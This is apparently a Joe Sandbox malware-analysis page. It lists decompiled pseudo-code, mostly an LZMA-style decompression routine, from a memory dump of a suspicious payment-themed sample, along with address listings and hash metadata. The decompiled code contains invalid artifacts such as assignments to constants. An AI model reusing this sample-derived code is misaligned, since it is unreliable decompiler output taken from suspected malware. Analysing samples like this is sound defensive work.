												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x0040711c
0x0040711c
0x00407120
0x0040712d
0x00407137
0x00000000
0x00407122
0x00407122
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00407056
0x00407059
0x004073cb
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x004073cb
0x004073cb
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb
0x00000000
0x00407120

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
